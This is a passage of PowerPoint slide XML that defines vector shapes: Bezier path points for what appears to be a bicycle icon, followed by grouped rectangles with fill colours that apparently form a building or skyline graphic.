                  <a:gd name="T59" fmla="*/ 797 h 1230"/>
                  <a:gd name="T60" fmla="*/ 652 w 1898"/>
                  <a:gd name="T61" fmla="*/ 428 h 1230"/>
                  <a:gd name="T62" fmla="*/ 459 w 1898"/>
                  <a:gd name="T63" fmla="*/ 799 h 1230"/>
                  <a:gd name="T64" fmla="*/ 679 w 1898"/>
                  <a:gd name="T65" fmla="*/ 798 h 1230"/>
                  <a:gd name="T66" fmla="*/ 88 w 1898"/>
                  <a:gd name="T67" fmla="*/ 844 h 1230"/>
                  <a:gd name="T68" fmla="*/ 483 w 1898"/>
                  <a:gd name="T69" fmla="*/ 563 h 1230"/>
                  <a:gd name="T70" fmla="*/ 348 w 1898"/>
                  <a:gd name="T71" fmla="*/ 867 h 1230"/>
                  <a:gd name="T72" fmla="*/ 386 w 1898"/>
                  <a:gd name="T73" fmla="*/ 888 h 1230"/>
                  <a:gd name="T74" fmla="*/ 386 w 1898"/>
                  <a:gd name="T75" fmla="*/ 1142 h 1230"/>
                  <a:gd name="T76" fmla="*/ 720 w 1898"/>
                  <a:gd name="T77" fmla="*/ 366 h 1230"/>
                  <a:gd name="T78" fmla="*/ 921 w 1898"/>
                  <a:gd name="T79" fmla="*/ 762 h 1230"/>
                  <a:gd name="T80" fmla="*/ 1214 w 1898"/>
                  <a:gd name="T81" fmla="*/ 844 h 1230"/>
                  <a:gd name="T82" fmla="*/ 1470 w 1898"/>
                  <a:gd name="T83" fmla="*/ 857 h 1230"/>
                  <a:gd name="T84" fmla="*/ 1525 w 1898"/>
                  <a:gd name="T85" fmla="*/ 886 h 1230"/>
                  <a:gd name="T86" fmla="*/ 1554 w 1898"/>
                  <a:gd name="T87" fmla="*/ 831 h 1230"/>
                  <a:gd name="T88" fmla="*/ 1512 w 1898"/>
                  <a:gd name="T89" fmla="*/ 546 h 1230"/>
                  <a:gd name="T90" fmla="*/ 1512 w 1898"/>
                  <a:gd name="T91" fmla="*/ 11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8" h="1230">
                    <a:moveTo>
                      <a:pt x="1512" y="458"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1489" y="458"/>
                      <a:pt x="1466" y="460"/>
                      <a:pt x="1443" y="464"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1443" y="462"/>
                      <a:pt x="1443" y="462"/>
                      <a:pt x="1443" y="462"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1359" y="81"/>
                      <a:pt x="1359" y="81"/>
                      <a:pt x="1359" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1354" y="61"/>
                      <a:pt x="1336" y="47"/>
                      <a:pt x="1315" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1177" y="47"/>
                      <a:pt x="1177" y="47"/>
                      <a:pt x="1177" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1171" y="46"/>
                      <a:pt x="1147" y="41"/>
                      <a:pt x="1124" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1107" y="0"/>
                      <a:pt x="1079" y="0"/>
                      <a:pt x="1062" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1045" y="35"/>
                      <a:pt x="1045" y="63"/>
                      <a:pt x="1062" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1112" y="130"/>
                      <a:pt x="1165" y="134"/>
                      <a:pt x="1171" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1174" y="135"/>
                      <a:pt x="1174" y="135"/>
                      <a:pt x="1174" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1280" y="135"/>
                      <a:pt x="1280" y="135"/>
                      <a:pt x="1280" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1312" y="278"/>
                      <a:pt x="1312" y="278"/>
                      <a:pt x="1312" y="278"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="675" y="278"/>
                      <a:pt x="675" y="278"/>
                      <a:pt x="675" y="278"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="636" y="202"/>
                      <a:pt x="636" y="202"/>
                      <a:pt x="636" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="655" y="200"/>
                      <a:pt x="655" y="200"/>
                      <a:pt x="655" y="200"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="656" y="200"/>
                      <a:pt x="657" y="200"/>
                      <a:pt x="658" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="691" y="196"/>
                      <a:pt x="717" y="169"/>
                      <a:pt x="717" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="717" y="102"/>
                      <a:pt x="692" y="75"/>
                      <a:pt x="660" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="658" y="70"/>
                      <a:pt x="655" y="70"/>
                      <a:pt x="652" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="454" y="70"/>
                      <a:pt x="454" y="70"/>
                      <a:pt x="454" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="451" y="70"/>
                      <a:pt x="448" y="70"/>
                      <a:pt x="445" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="409" y="75"/>
                      <a:pt x="381" y="106"/>
                      <a:pt x="381" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="381" y="181"/>
                      <a:pt x="409" y="211"/>
                      <a:pt x="446" y="215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="448" y="216"/>
                      <a:pt x="451" y="216"/>
                      <a:pt x="453" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="454" y="216"/>
                      <a:pt x="454" y="216"/>
                      <a:pt x="454" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="454" y="216"/>
                      <a:pt x="454" y="216"/>
                      <a:pt x="454" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="455" y="216"/>
                      <a:pt x="457" y="216"/>
                      <a:pt x="458" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="541" y="209"/>
                      <a:pt x="541" y="209"/>
                      <a:pt x="541" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="603" y="331"/>
                      <a:pt x="603" y="331"/>
                      <a:pt x="603" y="331"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="524" y="484"/>
                      <a:pt x="524" y="484"/>
                      <a:pt x="524" y="484"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="481" y="467"/>
                      <a:pt x="434" y="458"/>
                      <a:pt x="386" y="458"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="458"/>
                      <a:pt x="0" y="631"/>
                      <a:pt x="0" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1057"/>
                      <a:pt x="173" y="1230"/>
                      <a:pt x="386" y="1230"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="585" y="1230"/>
                      <a:pt x="749" y="1079"/>
                      <a:pt x="769" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="912" y="885"/>
                      <a:pt x="912" y="885"/>
                      <a:pt x="912" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="915" y="884"/>
                      <a:pt x="918" y="884"/>
                      <a:pt x="921" y="883"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="922" y="883"/>
                      <a:pt x="923" y="883"/>
                      <a:pt x="924" y="883"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="926" y="882"/>
                      <a:pt x="928" y="881"/>
                      <a:pt x="931" y="880"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="931" y="880"/>
                      <a:pt x="931" y="880"/>
                      <a:pt x="931" y="880"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="933" y="879"/>
                      <a:pt x="934" y="878"/>
                      <a:pt x="935" y="877"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="936" y="877"/>
                      <a:pt x="937" y="876"/>
                      <a:pt x="938" y="875"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="940" y="874"/>
                      <a:pt x="942" y="872"/>
                      <a:pt x="943" y="870"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="944" y="870"/>
                      <a:pt x="944" y="870"/>
                      <a:pt x="945" y="869"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="945" y="869"/>
                      <a:pt x="945" y="869"/>
                      <a:pt x="945" y="869"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="945" y="869"/>
                      <a:pt x="945" y="869"/>
                      <a:pt x="945" y="869"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1341" y="411"/>
                      <a:pt x="1341" y="411"/>
                      <a:pt x="1341" y="411"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1357" y="483"/>
                      <a:pt x="1357" y="483"/>
                      <a:pt x="1357" y="483"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1358" y="486"/>
                      <a:pt x="1358" y="486"/>
                      <a:pt x="1358" y="486"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1359" y="490"/>
                      <a:pt x="1359" y="490"/>
                      <a:pt x="1359" y="490"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1222" y="549"/>
                      <a:pt x="1126" y="685"/>
                      <a:pt x="1126" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1126" y="1057"/>
                      <a:pt x="1299" y="1230"/>
                      <a:pt x="1512" y="1230"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1725" y="1230"/>
                      <a:pt x="1898" y="1057"/>
                      <a:pt x="1898" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1898" y="631"/>
                      <a:pt x="1725" y="458"/>
                      <a:pt x="1512" y="458"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="652" y="428"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="840" y="797"/>
                      <a:pt x="840" y="797"/>
                      <a:pt x="840" y="797"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="769" y="797"/>
                      <a:pt x="769" y="797"/>
                      <a:pt x="769" y="797"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="755" y="684"/>
                      <a:pt x="692" y="586"/>
                      <a:pt x="602" y="525"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="652" y="428"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="679" y="798"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="459" y="799"/>
                      <a:pt x="459" y="799"/>
                      <a:pt x="459" y="799"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="561" y="604"/>
                      <a:pt x="561" y="604"/>
                      <a:pt x="561" y="604"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="623" y="649"/>
                      <a:pt x="667" y="718"/>
                      <a:pt x="679" y="798"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="386" y="1142"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="221" y="1141"/>
                      <a:pt x="88" y="1008"/>
                      <a:pt x="88" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="680"/>
                      <a:pt x="221" y="547"/>
                      <a:pt x="386" y="546"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="420" y="547"/>
                      <a:pt x="452" y="553"/>
                      <a:pt x="483" y="563"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="347" y="824"/>
                      <a:pt x="347" y="824"/>
                      <a:pt x="347" y="824"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="340" y="837"/>
                      <a:pt x="340" y="854"/>
                      <a:pt x="348" y="867"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="356" y="880"/>
                      <a:pt x="371" y="888"/>
                      <a:pt x="386" y="888"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="386" y="888"/>
                      <a:pt x="386" y="888"/>
                      <a:pt x="386" y="888"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="680" y="886"/>
                      <a:pt x="680" y="886"/>
                      <a:pt x="680" y="886"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="659" y="1030"/>
                      <a:pt x="536" y="1141"/>
                      <a:pt x="386" y="1142"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="921" y="762"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="720" y="366"/>
                      <a:pt x="720" y="366"/>
                      <a:pt x="720" y="366"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1263" y="366"/>
                      <a:pt x="1263" y="366"/>
                      <a:pt x="1263" y="366"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="921" y="762"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="1512" y="1142"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1348" y="1141"/>
                      <a:pt x="1215" y="1008"/>
                      <a:pt x="1214" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1215" y="725"/>
                      <a:pt x="1284" y="623"/>
                      <a:pt x="1385" y="575"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1470" y="857"/>
                      <a:pt x="1470" y="857"/>
                      <a:pt x="1470" y="857"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1476" y="876"/>
                      <a:pt x="1493" y="888"/>
                      <a:pt x="1512" y="888"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1516" y="888"/>
                      <a:pt x="1521" y="888"/>
                      <a:pt x="1525" y="886"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1548" y="879"/>
                      <a:pt x="1561" y="855"/>
                      <a:pt x="1554" y="831"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1554" y="831"/>
                      <a:pt x="1554" y="831"/>
                      <a:pt x="1554" y="831"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1469" y="550"/>
                      <a:pt x="1469" y="550"/>
                      <a:pt x="1469" y="550"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1483" y="548"/>
                      <a:pt x="1497" y="547"/>
                      <a:pt x="1512" y="546"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1676" y="547"/>
                      <a:pt x="1809" y="680"/>
                      <a:pt x="1810" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1809" y="1008"/>
                      <a:pt x="1676" y="1141"/>
                      <a:pt x="1512" y="1142"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="00BCF2"/>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grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="493" name="Group 492"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8471394" y="5022998"/>
              <a:ext cx="3720175" cy="1499670"/>
              <a:chOff x="4092791" y="3635676"/>
              <a:chExt cx="8355063" cy="3368075"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="494" name="Group 493"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="4092791" y="3635676"/>
                <a:ext cx="8355063" cy="3368075"/>
                <a:chOff x="3324709" y="3101831"/>
                <a:chExt cx="8935445" cy="3602037"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="497" name="AutoShape 4"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3324709" y="3101831"/>
                  <a:ext cx="8935445"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498" name="Rectangle 6"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6464880" y="5419697"/>
                  <a:ext cx="531508" cy="1214527"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:lumMod val="8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499" name="Rectangle 7"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6312151" y="4896741"/>
                  <a:ext cx="245593" cy="1737482"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="0072C6">
                    <a:lumMod val="7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0" name="Rectangle 8"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6996391" y="5682395"/>
                  <a:ext cx="475302" cy="951828"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="0072C6">
                    <a:lumMod val="7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1" name="Rectangle 9"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7189445" y="5235195"/>
                  <a:ext cx="476525" cy="1399028"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">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2" name="Rectangle 10"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10228205" y="5419696"/>
                  <a:ext cx="245593" cy="1214527"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:lumMod val="8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3" name="Rectangle 11"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10075472" y="4896741"/>
                  <a:ext cx="245593" cy="1737482"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="0072C6">
                    <a:lumMod val="7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4" name="Rectangle 12"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10759713" y="5682395"/>
                  <a:ext cx="475302" cy="951828"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">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5" name="Rectangle 13"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10952766" y="5235195"/>
                  <a:ext cx="476525" cy="1399028"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="0072C6">
                    <a:lumMod val="7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6" name="Rectangle 14"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9408338" y="5044585"/>
                  <a:ext cx="779545" cy="165683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7" name="Rectangle 15"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9835988" y="6504706"/>
                  <a:ext cx="103858" cy="19672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8" name="Rectangle 16"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9660041" y="6504706"/>
                  <a:ext cx="103858" cy="19672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09" name="Rectangle 17"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9486537" y="5818021"/>
                  <a:ext cx="626813" cy="100192"/>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0" name="Rectangle 18"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9486537" y="5993969"/>
                  <a:ext cx="626813"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1" name="Rectangle 19"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9486537" y="6167473"/>
                  <a:ext cx="626813" cy="100192"/>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2" name="Rectangle 20"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9486537" y="6343420"/>
                  <a:ext cx="626813" cy="100192"/>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3" name="Rectangle 21"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9486537" y="5468570"/>
                  <a:ext cx="626813"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4" name="Rectangle 22"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9486537" y="5644518"/>
                  <a:ext cx="626813" cy="9774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5" name="Rectangle 23"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9486537" y="5119119"/>
                  <a:ext cx="626813"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6" name="Rectangle 24"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9486537" y="5295066"/>
                  <a:ext cx="626813"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7" name="Rectangle 26"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4767723" y="5044585"/>
                  <a:ext cx="779545" cy="165683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8" name="Rectangle 27"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5195373" y="6504706"/>
                  <a:ext cx="103858" cy="19672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19" name="Rectangle 28"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5019425" y="6504706"/>
                  <a:ext cx="103858" cy="19672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0" name="Rectangle 29"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4845921" y="5818021"/>
                  <a:ext cx="625591" cy="100192"/>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1" name="Rectangle 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4845921" y="5993969"/>
                  <a:ext cx="625591"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2" name="Rectangle 31"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4845921" y="6167473"/>
                  <a:ext cx="625591" cy="100192"/>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3" name="Rectangle 32"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4845921" y="6343420"/>
                  <a:ext cx="625591" cy="100192"/>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4" name="Rectangle 33"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4845921" y="5468570"/>
                  <a:ext cx="625591"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5" name="Rectangle 34"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4845921" y="5644518"/>
                  <a:ext cx="625591" cy="9774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6" name="Rectangle 35"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4845921" y="5119119"/>
                  <a:ext cx="625591"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7" name="Rectangle 36"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4845921" y="5295066"/>
                  <a:ext cx="625591" cy="10141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8" name="Freeform 37"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7823589" y="5725160"/>
                  <a:ext cx="1160765" cy="976265"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 522 w 950"/>
                    <a:gd name="T1" fmla="*/ 135 h 799"/>
                    <a:gd name="T2" fmla="*/ 522 w 950"/>
                    <a:gd name="T3" fmla="*/ 0 h 799"/>
                    <a:gd name="T4" fmla="*/ 626 w 950"/>
                    <a:gd name="T5" fmla="*/ 0 h 799"/>
                    <a:gd name="T6" fmla="*/ 626 w 950"/>
                    <a:gd name="T7" fmla="*/ 135 h 799"/>
                    <a:gd name="T8" fmla="*/ 662 w 950"/>
                    <a:gd name="T9" fmla="*/ 135 h 799"/>
                    <a:gd name="T10" fmla="*/ 662 w 950"/>
                    <a:gd name="T11" fmla="*/ 0 h 799"/>
                    <a:gd name="T12" fmla="*/ 766 w 950"/>
